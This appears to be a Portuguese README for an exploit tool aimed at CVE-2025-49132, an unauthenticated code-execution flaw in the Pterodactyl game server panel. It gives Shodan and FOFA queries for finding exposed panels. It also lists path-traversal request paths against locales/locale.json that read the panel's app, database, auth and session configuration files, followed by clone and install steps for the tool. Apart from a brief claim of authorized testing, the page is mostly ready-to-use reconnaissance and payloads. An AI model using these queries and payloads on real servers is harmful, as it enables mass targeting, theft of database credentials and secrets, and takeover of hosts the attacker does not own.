
Ferramenta de exploração para CVE-2025-49132, uma RCE crítica não autenticada em painéis de servidores de jogos Pterodactyl. Inclui consultas de reconhecimento e payloads para testes de penetração autorizados.
Ferramenta de exploração para CVE-2025-49132 — uma vulnerabilidade crítica de execução arbitrária de código não autenticada que afeta o painel de servidor de jogos Pterodactyl.
Uma falha crítica de ACE no painel Pterodactyl que permite que atacantes remotos não autenticados executem código arbitrário — potencialmente levando ao comprometimento total do sistema.
Nenhuma autenticação necessária. Apenas uma instância vulnerável.
Shodan
http.title:"Pterodactyl"
FOFA
"Pterodactyl"
locales/locale.json?locale=../../../pterodactyl&namespace=config/app
locales/locale.json?locale=../../../pterodactyl&namespace=config/database
locales/locale.json?locale=../../../pterodactyl&namespace=config/auth
locales/locale.json?locale=../../../pterodactyl&namespace=config/session
git clone https://github.com/yurahshell/CVE-2025-49132
cd CVE-2025-49132
pip install -r requirements.txt
| Software | Status |
|---|---|
| Pterodactyl Panel |